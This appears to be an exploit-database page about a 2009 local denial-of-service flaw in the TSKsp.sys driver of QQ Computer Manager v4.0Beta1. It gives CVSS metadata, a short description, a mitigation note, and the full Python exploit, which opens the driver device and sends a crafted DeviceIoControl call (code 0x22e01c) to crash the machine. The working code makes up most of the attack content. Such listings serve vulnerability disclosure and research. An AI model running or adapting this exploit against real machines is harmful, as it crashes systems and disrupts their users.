QQ Computer Manager TSKsp.sys Local Denial of Service Exploit

vendor:

QQ Computer Manager

by:

Lufeng Li

7,2

CVSS

HIGH

Local Denial of Service

399

CWE

Product Name: QQ Computer Manager

Affected Version From: QQpcmgr v4.0Beta1

Affected Version To: QQpcmgr v4.0Beta1

Patch Exists: YES

Related CWE: N/A

CPE: a:qq:qq_computer_manager

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XPSP3 Chinese Simplified

2009

QQ Computer Manager TSKsp.sys Local Denial of Service Exploit

This exploit is a local denial of service vulnerability in the QQ Computer Manager TSKsp.sys driver. It is triggered by sending a DeviceIoControl call to the driver with a specific parameter. This causes the driver to crash, resulting in a denial of service.

Mitigation:

Update to the latest version of QQ Computer Manager to patch this vulnerability.

Source

Exploit-DB raw data:

#!/usr/bin/python

#################################################################
#
# Title: QQ Computer Manager TSKsp.sys Local Denial of Service Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: http://pcmgr.qq.com
# Vulnerable App: http://dl_dir2.qq.com/invc/qqmaster/setup/QQPCMgr_Setup.exe
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQpcmgr v4.0Beta1
# Vulnerable: QQpcmgr<=v4.0Beta1
# 
#################################################################
from ctypes import *

kernel32 = windll.kernel32
Psapi    = windll.Psapi

if __name__ == '__main__':
    GENERIC_READ  = 0x80000000
    GENERIC_WRITE = 0x40000000
    OPEN_EXISTING = 0x3
    CREATE_ALWAYS = 0x2

    DEVICE_NAME   = "\\\\.\\tsksp"
    dwReturn      = c_ulong()
    out_data      = ''
    in_data       = ''
    driver_handle1 = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE,
						0, None, CREATE_ALWAYS, 0, None)
    dev_ioctl = kernel32.DeviceIoControl(driver_handle1, 0x22e01c, in_data,0, out_data, 0,byref(dwReturn), None)